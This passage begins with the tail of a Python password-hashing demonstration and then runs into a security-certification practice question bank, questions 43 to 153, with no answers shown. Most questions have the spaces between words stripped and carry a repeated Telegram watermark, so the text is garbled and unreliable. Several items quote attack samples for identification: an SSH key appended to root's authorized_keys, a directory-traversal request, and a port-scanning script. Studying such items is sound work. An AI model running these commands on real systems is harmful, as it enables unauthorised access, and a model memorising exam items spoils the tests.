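    digest = hashlib.pbkdf2_hmac("sha256", password.encode() + pepper, salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, stored_digest, pepper=PEPPER):
    """Recompute with the stored salt and compare in constant time so response
    timing does not reveal how many leading bytes matched."""
    _, digest = hash_password(password, salt, pepper)
    return hmac.compare_digest(digest, stored_digest)


if __name__ == "__main__":
    table = build_precomputed_table(WORDLIST)
    print("unsalted lookup:", lookup(table, unsalted_sha256_hex("letmein")))   # letmein
    salt, digest = hash_password("letmein")
    print("salted lookup:", lookup(table, digest.hex()))                       # None
    print("verify:", verify_password("letmein", salt, digest))                 # True
```

Note that the table defeat comes from the salt alone; the pepper and the slow KDF are there for the case the question actually asks about, an offline attack where the attacker has the file and will build a fresh table per salt if each guess is cheap enough.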
43. What risk is commonly associated with a lack of vendor support for a product, such as an outdated version of a device?
A. Improper data storage
B. Lack of patches or updates
C. Lack of available documentation
D. System integration and configuration issues
44. You have noticed that when in a crowded area, you sometimes get a stream of unwanted text messages. The messages end when you leave the area. What describes this attack?
A. Bluejacking
B. Bluesnarfing
C. Evil twin
D. Rogue access point
45. Dennis uses an on-path attack to cause a system to send HTTPS traffic to his system and then forwards it to the actual server the traffic is intended for. What type of password attack can he conduct with the data he gathers if he captures all the traffic from a login form?
A. A plain-text password attack
B. A pass-the-hash attack
C. A SQL injection attack
D. A cross-site scripting attack
46. Someone has been rummaging through your company's trash bins seeking to find documents, diagrams, or other sensitive information that has been thrown out. What is this called?
A. Dumpster diving
B. Trash diving
C. Social engineering
D. Trash engineering
47. Louis is investigating a malware incident on one of the computers on his network. He has discovered unknown software that seems to be opening a port, allowing someone to remotely connect to the computer. This software seems to have been installed at the same time as a small shareware application. Which of the following best describes this malware?
A. RAT
B. Worm
C. Logic bomb
D. Rootkit
48. Jared is responsible for network security at his company. He has discovered behavior on one computer that certainly appears to be a virus. He has even identified a file he thinks might be the virus. However, using three separate antivirus programs, he finds that none can detect the file. Which of the following is most likely to be occurring?
A. The computer has a RAT.
B. The computer has a zero-day exploit.
C. The computer has a worm.
D. The computer has a rootkit.
49. Which of the following is not a common means of attacking RFID badges?
A. Data capture
B. Spoofing
C. Denial-of-service
D. Birthday attacks
50. Your wireless network has been breached. It appears the attacker modified a portion of data used with the stream cipher and used this to expose wirelessly encrypted data. What is this attack called?
A. Evil twin
B. Rogue WAP
C. IV attack
D. WPS attack
51. The company that Scott works for has experienced a data breach, and the personal information of thousands of customers has been exposed. Which of the following impact categories is not a concern as described in this scenario?
A. Financial
B. Reputation
C. Availability loss
D. Data loss
52. What type of attack exploits the trust that a website has for an authenticated user to attack that website by spoofing requests from the trusted user?
A. Cross-site scripting
B. Cross-site request forgery
C. Bluejacking
D. Evil twin
53. What purpose does a fusion center serve in cyber intelligence activities?
A. It promotes information sharing between agencies or organizations.
B. It combines security technologies to create new, more powerful tools.
C. It generates power for the local community in a secure way.
D. It separates information by classification ratings to avoid accidental distribution.
54. CVEisanexampleofwhattypeoffeed?
A. Athreatintelligencefeed
B. Avulnerabilityfeed
C. Acriticalinfrastructurelistingfeed
D. Acriticalvirtualizationexploitsfeed
55. Whattypeofattackisabirthdayattack?
Telegram Channel @nettrain
A. Asocialengineeringattack
B. Acryptographicattack
C. Anetworkdenial-of-serviceattack
D. ATCP/IPprotocolattack
56. JuanitaisanetworkadministratorforAcmeCompany.Someuserscomplainthattheykeepgettingdroppedfromthenetwork.WhenJuanitachecksthelogsforthewirelessaccesspoint(WAP),shefindsthatadeauthenticationpackethasbeensenttotheWAPfromtheusers'IPaddresses.Whatseemstobehappeninghere?
A. Problemwithusers'Wi-Ficonfiguration
B. Disassociationattack
C. Sessionhijacking
D. Backdoorattack
57. Johnhasdiscoveredthatanattackeristryingtogetnetworkpasswordsbyusingsoftwarethatattemptsanumberofpasswordsfromalistofcommonpasswords.Whattypeofattackisthis?
A. Dictionary
B. Rainbowtable
C. Bruteforce
D. Sessionhijacking
58. Youareanetworksecurityadministratorforabank.YoudiscoverthatanattackerhasexploitedaflawinOpenSSLandforcedsomeconnectionstomovetoaweakciphersuiteversionofTLS,whichtheattackercouldbreach.Whattypeofattackwasthis?
A. Disassociationattack
B. Downgradeattack
C. Sessionhijacking
D. Bruteforce
59. Whenanattackertriestofindaninputvaluethatwillproducethesamehashasapassword,whattypeofattackisthis?
Telegram Channel @nettrain
A. Rainbowtable
B. Bruteforce
C. Sessionhijacking
D. Collisionattack
60. Farèsisthenetworksecurityadministratorforacompanythatcreatesadvancedroutersandswitches.Hehasdiscoveredthathiscompany'snetworkshavebeensubjectedtoaseriesofadvancedattacksoveraperiodoftime.Whatbestdescribesthisattack?
A. DDoS
B. Bruteforce
C. APT
D. Disassociationattack
61. Whattypeofinformationisphishingnotcommonlyintendedtoacquire?
A. Passwords
B. Emailaddresses
C. Creditcardnumbers
D. Personalinformation
62. JohnisrunninganIDSonhisnetwork.UserssometimesreportthattheIDSflagslegitimatetrafficasanattack.Whatdescribesthis?
A. Falsepositive
B. Falsenegative
C. Falsetrigger
D. Falseflag
63. Scottdiscoversthatmalwarehasbeeninstalledononeofthesystemsheisresponsiblefor.Shortlyafterwardpasswordsusedbytheuserthatthesystemisassignedtoarediscoveredtobeinusebyattackers.WhattypeofmaliciousprogramshouldScottlookforonthecompromisedsystem?
A. Arootkit
B. Akeylogger
Telegram Channel @nettrain
C. Aworm
D. Noneoftheabove
64. Youareperformingapenetrationtestofyourcompany'snetwork.Aspartofthetest,youwillbegivenaloginwithminimalaccessandwillattempttogainadministrativeaccesswiththisaccount.Whatisthiscalled?
A. Privilegeescalation
B. Sessionhijacking
C. Rootgrabbing
D. Climbing
65. MattdiscoversthatasystemonhisnetworkissendinghundredsofEthernetframestotheswitchitisconnectedto,witheachframecontainingadifferentsourceMACaddress.Whattypeofattackhashediscovered?
A. Etherspam
B. MACflooding
C. Hardwarespoofing
D. MAChashing
66. Spywareisanexampleofwhattypeofmalware?
A. Trojan
B. PUP
C. RAT
D. Ransomware
67. Maryhasdiscoveredthatawebapplicationusedbyhercompanydoesnotalwayshandlemultithreadingproperly,particularlywhenmultiplethreadsaccessthesamevariable.Thiscouldallowanattackerwhodiscoveredthisvulnerabilitytoexploititandcrashtheserver.WhattypeoferrorhasMarydiscovered?
A. Bufferoverflow
B. Logicbomb
C. Raceconditions
D. Impropererrorhandling
Telegram Channel @nettrain
68. Anattackeristryingtogetaccesstoyournetwork.Heissendingusersonyournetworkalinktoanewgamewithahackedlicensecodeprogram.However,thegamefilesalsoincludesoftwarethatwillgivetheattackeraccesstoanymachinethatitisinstalledon.Whattypeofattackisthis?
A. Rootkit
B. Trojanhorse
C. Spyware
D. Bootsectorvirus
69. ThefollowingimageshowsareportfromanOpenVASsystem.Whattypeofweakconfigurationisshownhere?
A. Weakencryption
B. Unsecuredadministrativeaccounts
C. Openportsandservices
D. Unsecureprotocols
70. Whileconductingapenetrationtest,Anniescansforsystemsonthenetworkshehasgainedaccessto.Shediscoversanothersystemwithinthesamenetworkthathasthesameaccountsandusertypesastheonesheison.Sinceshealreadyhasavaliduseraccountonthesystemshehasalreadyaccessed,sheisabletologintoit.Whattypeoftechniqueisthis?
Telegram Channel @nettrain
A. Lateralmovement
B. Privilegeescalation
C. Privilegeretention
D. Verticalmovement
71. AmandascansaRedHatLinuxserverthatshebelievesisfullypatchedanddiscoversthattheApacheversionontheserverisreportedasvulnerabletoanexploitfromafewmonthsago.Whenshecheckstoseeifsheismissingpatches,Apacheisfullypatched.Whathasoccurred?
A. Afalsepositive
B. Anautomaticupdatefailure
C. Afalsenegative
D. AnApacheversionmismatch
72. Whenaprogramhasvariables,especiallyarrays,anddoesnotchecktheboundaryvaluesbeforeinputtingdata,whatattackistheprogramvulnerableto?
A. XSS
B. CSRF
C. Bufferoverflow
D. Logicbomb
73. Tracyisconcernedthatthesoftwareshewantstodownloadmaynotbetrustworthy,soshesearchesforitandfindsmanypostingsclaimingthatthesoftwareislegitimate.Ifsheinstallsthesoftwareandlaterdiscoversitismaliciousandthatmaliciousactorshaveplantedthosereviews,whatprincipleofsocialengineeringhavetheyused?
A. Scarcity
B. Familiarity
C. Consensus
D. Trust
74. Whichofthefollowingbestdescribesmalwarethatwillexecutesomemaliciousactivitywhenaparticularconditionismet(i.e.,iftheconditionis
Telegram Channel @nettrain
met,thenexecuted)?
A. Bootsectorvirus
B. Logicbomb
C. Bufferoverflow
D. Sparseinfectorvirus
75. Whattermdescribesusingconversationaltacticsaspartofasocialengineeringexercisetoextractinformationfromtargets?
A. Pretexting
B. Elicitation
C. Impersonation
D. Intimidation
76. Telnet,RSH,andFTPareallexamplesofwhat?
A. Filetransferprotocols
B. Unsecureprotocols
C. Coreprotocols
D. Openports
77. Scottwantstodeterminewhereanorganization'swirelessnetworkcanbeaccessedfrom.Whattestingtechniquesarehismostlikelyoptions?
A. OSINTandactivescans
B. Wardrivingandwarflying
C. Socialengineeringandactivescans
D. OSINTandwardriving
78. Geraldisanetworkadministratorforasmallfinancialservicescompany.Usersarereportingoddbehaviorthatappearstobecausedbyavirusontheirmachines.Afterisolatingthemachinesthathebelievesareinfected,Geraldanalyzesthem.Hefindsthatalltheinfectedmachinesreceivedanemailpurportingtobefromaccounting,withanExcelspreadsheet,andtheusersopenedthespreadsheet.Whatisthemostlikelyissueonthesemachines?
A. Amacrovirus
Telegram Channel @nettrain
B. Abootsectorvirus
C. ATrojanhorse
D. ARAT
79. Yourcompanyhashiredanoutsidesecurityfirmtoperformvarioustestsofyournetwork.Duringthevulnerabilityscan,youwillprovidethatcompanywithloginsforvarioussystems(i.e.,databaseserver,applicationserver,webserver,etc.)toaidintheirscan.Whatbestdescribesthis?
A. Aknownenvironmenttest
B. Agray-boxtest
C. Acredentialedscan
D. Anintrusivescan
80. Stevediscoversthefollowingcodeonasystem.Whatlanguageisitwrittenin,andwhatdoesitdo?
    import socket as skt
    for port in range(1, 9999):
        try:
            # one TCP socket per port, aimed at the local host
            sc = skt.socket(skt.AF_INET, skt.SOCK_STREAM)
            sc.settimeout(900)
            sc.connect(('127.0.0.1', port))
            print '%d:OPEN' % (port)
            sc.close()
        except:
            # connection refused or timed out: move on to the next port
            continue
A. Perl,vulnerabilityscanning
B. Python,portscanning
C. Bash,vulnerabilityscanning
D. PowerShell,portscanning
81. Whichofthefollowingiscommonlyusedinadistributeddenial-of-service(DDoS)attack?
A. Phishing
B. Adware
C. Botnet
Telegram Channel @nettrain
D. Trojan
82. Amandadiscoversthatamemberofherorganization'sstaffhasinstalledaremoteaccessTrojanontheiraccountingsoftwareserverandhasbeenaccessingitremotely.Whattypeofthreathasshediscovered?
A. Zero-day
B. Insiderthreat
C. Misconfiguration
D. Weakencryption
83. PostingsfromRussianagentsduringthe2016U.S.presidentialcampaigntoFacebookandTwitterareanexampleofwhattypeofeffort?
A. Impersonation
B. Asocialmediainfluencecampaign
C. Asymmetricwarfare
D. Awateringholeattack
84. Juanisresponsibleforincidentresponseatalargefinancialinstitution.HediscoversthatthecompanyWi-Fihasbeenbreached.Theattackerusedthesamelogincredentialsthatshipwiththewirelessaccesspoint(WAP).TheattackerwasabletousethosecredentialstoaccesstheWAPadministrativeconsoleandmakechanges.Whichofthefollowingbestdescribeswhatcausedthisvulnerabilitytoexist?
A. Improperlyconfiguredaccounts
B. Untrainedusers
C. Usingdefaultsettings
D. Failuretopatchsystems
85. Elizabethisinvestigatinganetworkbreachathercompany.Shediscoversaprogramthatwasabletoexecutecodewithintheaddressspaceofanotherprocessbyusingthetargetprocesstoloadaspecificlibrary.Whatbestdescribesthisattack?
A. Logicbomb
B. Sessionhijacking
Telegram Channel @nettrain
C. Bufferoverflow
D. DLLinjection
86. Whichofthefollowingthreatactorsismostlikelytobeassociatedwithanadvancedpersistentthreat(APT)?
A. Hacktivists
B. Stateactors
C. Scriptkiddies
D. Insiderthreats
87. Whatistheprimarydifferencebetweenanintrusiveandanonintrusivevulnerabilityscan?
A. Anintrusivescanisapenetrationtest.
B. Anonintrusivescanisjustadocumentcheck.
C. Anintrusivescancouldpotentiallydisruptoperations.
D. Anonintrusivescanwon'tfindmostvulnerabilities.
88. Yourcompanyoutsourceddevelopmentofanaccountingapplicationtoalocalprogrammingfirm.Afterthreemonthsofusingtheproduct,oneofyouradministratorsdiscoversthatthedevelopershaveinsertedawaytologinandbypassallsecurityandauthentication.Whatbestdescribesthis?
A. Logicbomb
B. Trojanhorse
C. Backdoor
D. Rootkit
89. Darylisinvestigatingarecentbreachofhiscompany'swebserver.Theattackerusedsophisticatedtechniquesandthendefacedthewebsite,leavingmessagesthatweredenouncingthecompany'spublicpolicies.Heandhisteamaretryingtodeterminethetypeofactorwhomostlikelycommittedthebreach.Basedontheinformationprovided,whowasthemostlikelythreatactor?
A. Ascript
B. Anation-state
Telegram Channel @nettrain
C. Organizedcrime
D. Hacktivists
90. Whattwotechniquesaremostcommonlyassociatedwithapharmingattack?
A. ModifyingthehostsfileonaPCorexploitingaDNSvulnerabilityonatrustedDNSserver
B. Phishingmanyusersandharvestingemailaddressesfromthem
C. Phishingmanyusersandharvestingmanypasswordsfromthem
D. SpoofingDNSserverIPaddressesormodifyingthehostsfileonaPC
91. Angelareviewstheauthenticationlogsforherwebsiteandseesattemptsfrommanydifferentaccountsusingthesamesetofpasswords.Whatisthisattacktechniquecalled?
A. Bruteforcing
B. Passwordspraying
C. Limitedloginattacks
D. Accountspinning
92. Wheninvestigatingbreachesandattemptingtoattributethemtospecificthreatactors,whichofthefollowingisnotoneoftheindicatorsofanAPT?
A. Long-termaccesstothetarget
B. Sophisticatedattacks
C. TheattackcomesfromaforeignIPaddress.
D. Theattackissustainedovertime.
93. Charlesdiscoversthatanattackerhasusedavulnerabilityinawebapplicationthathiscompanyrunsandhasthenusedthatexploittoobtainrootprivilegesonthewebserver.Whattypeofattackhashediscovered?
A. Cross-sitescripting
B. Privilegeescalation
C. ASQLinjection
D. Aracecondition
Telegram Channel @nettrain
94. Whattypeofattackusesasecondwirelessaccesspoint(WAP)thatbroadcaststhesameSSIDasalegitimateaccesspoint,inanattempttogetuserstoconnecttotheattacker'sWAP?
A. Eviltwin
B. IPspoofing
C. Trojanhorse
D. Privilegeescalation
95. Whichofthefollowingbestdescribesazero-dayvulnerability?
A. Avulnerabilitythatthevendorisnotyetawareof
B. Avulnerabilitythathasnotyetbeenbreached
C. Avulnerabilitythatcanbequicklyexploited(i.e.,inzerodays)
D. Avulnerabilitythatwillgivetheattackerbriefaccess(i.e.,zerodays)
96. Whattypeofattackinvolvesaddinganexpressionorphrasesuchasadding“SAFE”tomailheaders?
A. Pretexting
B. Phishing
C. SQLinjection
D. Prepending
97. Charleswantstoensurethathisoutsourcedcodedevelopmenteffortsareassecureaspossible.Whichofthefollowingisnotacommonpracticetoensuresecureremotecodedevelopment?
A. Ensuredevelopersaretrainedonsecurecodingtechniques.
B. Setdefinedacceptancecriteriaforcodesecurity.
C. Testcodeusingautomatedandmanualsecuritytestingsystems.
D. Auditallunderlyinglibrariesusedinthecode.
98. Youhavediscoveredthatthereareentriesinyournetwork'sdomainnameserverthatpointlegitimatedomainstounknownandpotentiallyharmfulIPaddresses.Whatbestdescribesthistypeofattack?
A. Abackdoor
Telegram Channel @nettrain
B. AnAPT
C. DNSpoisoning
D. ATrojanhorse
99. Spywareisanexampleofwhattypeofmalicioussoftware?
A. ACAT
B. Aworm
C. APUP
D. ATrojan
100. Whatbestdescribesanattackthatattachessomemalwaretoalegitimateprogramsothatwhentheuserinstallsthelegitimateprogram,theyinadvertentlyinstallthemalware?
A. Backdoor
B. Trojanhorse
C. RAT
D. Polymorphicvirus
101. Whichofthefollowingbestdescribessoftwarethatwillprovidetheattackerwithremoteaccesstothevictim'smachinebutthatiswrappedwithalegitimateprograminanattempttotrickthevictimintoinstallingit?
A. RAT
B. Backdoor
C. Trojanhorse
D. Macrovirus
102. Whatprocesstypicallyoccursbeforecardcloningattacksoccur?
A. Abrute-forceattack
B. Askimmingattack
C. Arainbowtableattack
D. Abirthdayattack
103. Whichofthefollowingisanattackthatseekstoattackawebsite,basedonthewebsite'strustofanauthenticateduser?
Telegram Channel @nettrain
A. XSS
B. XSRF
C. Bufferoverflow
D. RAT
104. Valerieisresponsibleforsecuritytestingapplicationsinhercompany.Shehasdiscoveredthatawebapplication,undercertainconditions,cangenerateamemoryleak.Whattypeofattackwouldthisleavetheapplicationvulnerableto?
A. DoS
B. Backdoor
C. SQLinjection
D. Bufferoverflow
105. ThemobilegamethatJackhasspentthelastyeardevelopinghasbeenreleased,andmaliciousactorsaresendingtraffictotheserverthatrunsittopreventitfromcompetingwithothergamesintheAppStore.Whattypeofdenial-of-serviceattackisthis?
A. AnetworkDDoS
B. AnoperationaltechnologyDDoS
C. AGDoS
D. AnapplicationDDoS
106. Charleshasbeentaskedwithbuildingateamthatcombinestechniquesfromattackersanddefenderstohelpprotecthisorganization.Whattypeofteamishebuilding?
A. Aredteam
B. Ablueteam
C. Awhiteteam
D. Apurpleteam
107. Mikeisanetworkadministratorwithasmallfinancialservicescompany.Hehasreceivedapop-upwindowthatstateshisfilesarenowencryptedandhemustpay.5bitcoinstogetthemdecrypted.Hetriestocheckthe
Telegram Channel @nettrain
filesinquestion,buttheirextensionshavechanged,andhecannotopenthem.Whatbestdescribesthissituation?
A. Mike'smachinehasarootkit.
B. Mike'smachinehasransomware.
C. Mike'smachinehasalogicbomb.
D. Mike'smachinehasbeenthetargetofwhaling.
108. Whenamultithreadedapplicationdoesnotproperlyhandlevariousthreadsaccessingacommonvalue,andonethreadcanchangethedatawhileanotherthreadisrelyingonit,whatflawisthis?
A. Memoryleak
B. Bufferoverflow
C. Integeroverflow
D. Timeofcheck/timeofuse
109. AcmeCompanyisusingsmartcardsthatusenear-fieldcommunication(NFC)ratherthanneedingtobeswiped.Thisismeanttomakephysicalaccesstosecureareasmoresecure.Whatvulnerabilitymightthisalsocreate?
A. Tailgating
B. Eavesdropping
C. IPspoofing
D. Raceconditions
110. RickbelievesthatWindowssystemsinhisorganizationarebeingtargetedbyfilelessviruses.Ifhewantstocaptureartifactsoftheirinfectionprocess,whichofthefollowingoptionsismostlikelytoprovidehimwithaviewintowhattheyaredoing?
A. Reviewingfull-diskimagesofinfectedmachines
B. TurningonPowerShelllogging
C. Disablingtheadministrativeuseraccount
D. AnalyzingWindowscrashdumpfiles
111. Johnisresponsibleforphysicalsecurityatalargemanufacturingplant.
Telegram Channel @nettrain
Employeesalluseasmartcardinordertoopenthefrontdoorandenterthefacility.Whichofthefollowingisacommonwayattackerswouldcircumventthissystem?
A. Phishing
B. Tailgating
C. Spoofingthesmartcard
D. RFIDspoofing
112. AdamwantstodownloadlistsofmaliciousoruntrustworthyIPaddressesanddomainsusingSTIXandTAXII.Whattypeofserviceishelookingfor?
A. Avulnerabilityfeed
B. Athreatfeed
C. Ahuntingfeed
D. Arulefeed
113. Duringanincidentinvestigation,Naominoticesthatasecondkeyboardwaspluggedintoasysteminapublicareaofhercompany'sbuilding.Shortlyafterthatevent,thesystemwasinfectedwithmalware,resultinginadatabreach.WhatshouldNaomilookforinherin-personinvestigation?
A. ATrojanhorsedownload
B. AmaliciousUSBcableordrive
C. Aworm
D. Noneoftheabove
114. YouareresponsibleforincidentresponseatAcmeCorporation.YouhavediscoveredthatsomeonehasbeenabletocircumventtheWindowsauthenticationprocessforaspecificnetworkapplication.Itappearsthattheattackertookthestoredhashofthepasswordandsentitdirectlytothebackendauthenticationservice,bypassingtheapplication.Whattypeofattackisthis?
A. Hashspoofing
B. Eviltwin
C. Shimming
Telegram Channel @nettrain
D. Passthehash
115. Auserinyourcompanyreportsthatshereceivedacallfromsomeoneclaimingtobefromthecompanytechnicalsupportteam.Thecallerstatedthattherewasavirusspreadingthroughthecompanyandtheyneededimmediateaccesstotheemployee'scomputertostopitfrombeinginfected.Whatsocial-engineeringprinciplesdidthecallerusetotrytotricktheemployee?
A. Urgencyandintimidation
B. Urgencyandauthority
C. Authorityandtrust
D. Intimidationandauthority
116. Afterrunningavulnerabilityscan,ElainediscoversthattheWindows10workstationsinhercompany'swarehousearevulnerabletomultipleknownWindowsexploits.Whatshouldsheidentifyastherootcauseinherreporttomanagement?
A. Unsupportedoperatingsystems
B. Improperorweakpatchmanagementfortheoperatingsystems
C. Improperorweakpatchmanagementforthefirmwareofthesystems
D. Useofunsecureprotocols
117. AhmedhasdiscoveredthatattackersspoofedIPaddressestocausethemtoresolvetoadifferenthardwareaddress.Themanipulationhaschangedthetablesmaintainedbythedefaultgatewayforthelocalnetwork,causingdatadestinedforonespecificMACaddresstonowberoutedelsewhere.Whattypeofattackisthis?
A. ARPpoisoning
B. DNSpoisoning
C. On-pathattack
D. Backdoor
118. Whattypeofpenetrationtestisbeingdonewhenthetesterisgivenextensiveknowledgeofthetargetnetwork?
A. Knownenvironment
Telegram Channel @nettrain
B. Fulldisclosure
C. Unknownenvironment
D. Redteam
119. Yourcompanyisinstitutinganewsecurityawarenessprogram.Youareresponsibleforeducatingendusersonavarietyofthreats,includingsocialengineering.Whichofthefollowingbestdefinessocialengineering?
A. Illegalcopyingofsoftware
B. Gatheringinformationfromdiscardedmanualsandprintouts
C. Usingpeopleskillstoobtainproprietaryinformation
D. Phishingemails
120. Whichofthefollowingattackscanbecausedbyauserbeingunawareoftheirphysicalsurroundings?
A. ARPpoisoning
B. Phishing
C. Shouldersurfing
D. Smurfattack
121. Whatarethetwomostcommongoalsofinvoicescams?
A. Receivingmoneyoracquiringcredentials
B. Acquiringcredentialsordeliveringarootkit
C. Receivingmoneyorstealingcryptocurrency
D. Acquiringcredentialsordeliveringransomware
122. Whichofthefollowingtypeoftestingusesanautomatedprocessofproactivelyidentifyingvulnerabilitiesofthecomputingsystemspresentonanetwork?
A. Securityaudit
B. Vulnerabilityscanning
C. Aknownenvironmenttest
D. Anunknownenvironmenttest
123. Johnhasbeenaskedtodoapenetrationtestofacompany.Hehasbeen
Telegram Channel @nettrain
givengeneralinformationbutnodetailsaboutthenetwork.Whatkindoftestisthis?
A. Partiallyknownenvironment
B. Knownenvironment
C. Unknownenvironment
D. Masked
124. Underwhichtypeofattackdoesanattacker'ssystemappeartobetheservertotherealclientandappeartobetheclienttotherealserver?
A. Denial-of-service
B. Replay
C. Eavesdropping
D. On-path
125. YouareasecurityadministratorforAcmeCorporation.Youhavediscoveredmalwareonsomeofyourcompany'smachines.Thismalwareseemstointerceptcallsfromthewebbrowsertolibraries,andthenmanipulatesthebrowsercalls.Whattypeofattackisthis?
A. Maninthebrowser
B. On-pathattack
C. Bufferoverflow
D. Sessionhijacking
126. Tonyisreviewingawebapplicationanddiscoversthewebsitegenerateslinkslikethefollowing:
https://www.example.com/login.html?
Relay=http%3A%2F%2Fexample.com%2Fsite.html
Whattypeofvulnerabilityisthiscodemostlikelytobesusceptibleto?
A. SQLinjection
B. URLredirection
C. DNSpoisoning
D. LDAPinjection
Telegram Channel @nettrain
127. YouareresponsibleforsoftwaretestingatAcmeCorporation.Youwanttocheckallsoftwareforbugsthatmightbeusedbyanattackertogainentranceintothesoftwareoryournetwork.Youhavediscoveredawebapplicationthatwouldallowausertoattempttoputa64-bitvalueintoa4-byteintegervariable.Whatisthistypeofflaw?
A. Memoryoverflow
B. Bufferoverflow
C. Variableoverflow
D. Integeroverflow
128. AngelahasdiscoveredanattackagainstsomeoftheusersofherwebsitethatleverageURLparametersandcookiestomakelegitimateusersperformunwantedactions.Whattypeofattackhasshemostlikelydiscovered?
A. SQLinjection
B. Cross-siterequestforgery
C. LDAPinjection
D. Cross-sitescripting
129. Nathandiscoversthefollowingcodeinthedirectoryofacompromiseduser.Whatlanguageisitusing,andwhatwillitdo?
echo"ssh-rsaABBAB4KAE9sdafAK…Mq/jc5YLfnAnbFDRABMhuWzaWUp
root@localhost">>/root/.ssh/authorized_keys
A. Python,addsanauthorizedSSHkey
B. Bash,connectstoanothersystemusinganSSHkey
C. Python,connectstoanothersystemusinganSSHkey
D. Bash,addsanauthorizedSSHkey
130. Jaredhasdiscoveredmalwareontheworkstationsofseveralusers.Thisparticularmalwareprovidesadministrativeprivilegesfortheworkstationtoanexternalhacker.Whatbestdescribesthismalware?
A. Trojanhorse
B. Logicbomb
C. Multipartitevirus
Telegram Channel @nettrain
D. Rootkit
131. Whyarememoryleaksapotentialsecurityissue?
A. Theycanexposesensitivedata.
B. Theycanallowattackerstoinjectcodeviatheleak.
C. Theycancausecrashes
D. Noneoftheabove
132. MichellediscoversthatanumberofsystemsthroughoutherorganizationareconnectingtoachangingsetofremotesystemsonTCPport6667.Whatisthemostlikelycauseofthis,ifshebelievesthetrafficisnotlegitimate?
A. Analternateserviceportforwebtraffic
B. BotnetcommandandcontrolviaIRC
C. Downloadsviaapeer-to-peernetwork
D. RemoteaccessTrojans
133. Susanperformsavulnerabilityscanofasmallbusinessnetworkanddiscoversthattheorganization'sconsumer-gradewirelessrouterhasavulnerabilityinitswebserver.Whatissueshouldsheaddressinherfindings?
A. Firmwarepatchmanagement
B. Defaultconfigurationissues
C. Anunsecuredadministrativeaccount
D. Weakencryptionsettings
134. WhereisanRFIDattackmostlikelytooccuraspartofapenetrationtest?
A. Systemauthentication
B. Accessbadges
C. Webapplicationaccess
D. VPNlogins
135. Whattypeofphishingattackoccursviatextmessages?
A. Bluejacking
B. Smishing
Telegram Channel @nettrain
C. Phonejacking
D. Textwhaling
136. Usersinyourcompanyreportsomeonehasbeencallingtheirextensionandclaimingtobedoingasurveyforalargevendor.Basedonthequestionsaskedinthesurvey,yoususpectthatthisisascamtoelicitinformationfromyourcompany'semployees.Whatbestdescribesthis?
A. Spearphishing
B. Vishing
C. Wardialing
D. Robocalling
137. Johnisanalyzingarecentmalwareinfectiononhiscompanynetwork.Hediscoversmalwarethatcanspreadrapidlyviavulnerablenetworkservicesanddoesnotrequireanyinteractionfromtheuser.Whatbestdescribesthismalware?
A. Worm
B. Virus
C. Logicbomb
D. Trojanhorse
138. Yourcompanyhasissuedsomenewsecuritydirectives.Oneofthesenewdirectivesisthatalldocumentsmustbeshreddedbeforebeingthrownout.Whattypeofattackisthistryingtoprevent?
A. Phishing
B. Dumpsterdiving
C. Shouldersurfing
D. On-pathattack
139. Whichofthefollowingisnotacommonpartofacleanupprocessafterapenetrationtest?
A. Removingallexecutablesandscriptsfromthecompromisedsystem
B. Restoringallrootkitstotheiroriginalsettingsonthesystem
C. Returningallsystemsettingsandapplicationconfigurationstotheir
Telegram Channel @nettrain
originalconfigurations
D. Removinganyuseraccountscreatedduringthepenetrationtest
140. Youhavediscoveredthatsomeonehasbeentryingtologontoyourwebserver.Thepersonhastriedawiderangeoflikelypasswords.Whattypeofattackisthis?
A. Rainbowtable
B. Birthdayattack
C. Dictionaryattack
D. Spoofing
141. Jimdiscoversaphysicaldeviceattachedtoagaspump'screditcardreader.Whattypeofattackhashelikelydiscovered?
A. Areplayattack
B. Aracecondition
C. Askimmer
D. Acardcloner
142. Whatistheprimarydifferencebetweenactiveandpassivereconnaissance?
A. Activewillbedonemanually,passivewithtools.
B. Activeisdonewithblack-boxtestsandpassivewithwhite-boxtests.
C. Activeisusuallydonebyattackersandpassivebytesters.
D. Activewillactuallyconnecttothenetworkandcouldbedetected;passivewon't.
143. Abrowsertoolbarisanexampleofwhattypeofmalware?
A. Arootkit
B. ARAT
C. Aworm
D. APUP
144. Whattermdescribesdatathatiscollectedfrompubliclyavailablesourcesthatcanbeusedinanintelligencecontext?
A. OPSEC
Telegram Channel @nettrain
B. OSINT
C. IntCon
D. STIX
145. Whattypeofattacktargetsaspecificgroupofusersbyinfectingoneormorewebsitesthatthatgroupisspecificallyknowntovisitfrequently?
A. Awatercoolerattack
B. Aphishingnetattack
C. Awateringholeattack
D. Aphishpondattack
146. TracyisconcernedaboutLDAPinjectionattacksagainstherdirectoryserver.WhichofthefollowingisnotacommontechniquetopreventLDAPinjectionattacks?
A. SecureconfigurationofLDAP
B. Userinputvalidation
C. LDAPqueryparameterization
D. Outputfilteringrules
147. FredusesaTorproxytobrowseforsitesaspartofhisthreatintelligence.WhattermisfrequentlyusedtodescribethispartoftheInternet?
A. Throughthelookingglass
B. Thedarkweb
C. Theunderweb
D. Onion-space
148. WhatbrowserfeatureisusedtohelppreventsuccessfulURLredirectionattacks?
A. Certificateexpirationtracking
B. DisplayingthefullrealURL
C. Disablingcookies
D. EnablingJavaScript
149. Whatisthemostsignificantdifferencebetweencloudservice-basedand
Telegram Channel @nettrain
on-premisesvulnerabilities?
A. Yourabilitytoremediateityourself
B. Theseverityofthevulnerability
C. Thetimerequiredtoremediate
D. Yourresponsibilityforcompromiseddata
150. Christinarunsavulnerabilityscanofacustomernetworkanddiscoversthataconsumerwirelessrouteronthenetworkreturnsaresultreportingdefaultlogincredentials.Whatcommonconfigurationissuehassheencountered?
A. Anunpatcheddevice
B. Anoutofsupportdevice
C. Anunsecuredadministratoraccount
D. Anunsecureduseraccount
151. Whattypeofteamisusedtotestsecuritybyusingtoolsandtechniquesthatanactualattackerwoulduse?
A. Aredteam
B. Ablueteam
C. Awhiteteam
D. Apurpleteam
152. Whilereviewingweblogsforherorganization'swebsiteKathleendiscoverstheentryshownhere:
GEThttp://example.com/viewarticle.php?view=../../../config.txt
HTTP/1.1
Whattypeofattackhasshepotentiallydiscovered?
A. Adirectorytraversalattacks
B. Awebapplicationbufferoverflow
C. Adirectoryrecursionattack
D. Aslashdotattack
153. WhatisthekeydifferentiatorbetweenSOARandSIEMsystems?
Telegram Channel @nettrain
A. SOARintegrateswithawiderrangeofapplications.
B. SIEMincludesthreatandvulnerabilitymanagementtools.
C. SOARincludessecurityoperationsautomation.
D. SIEMincludessecurityoperationsautomation.
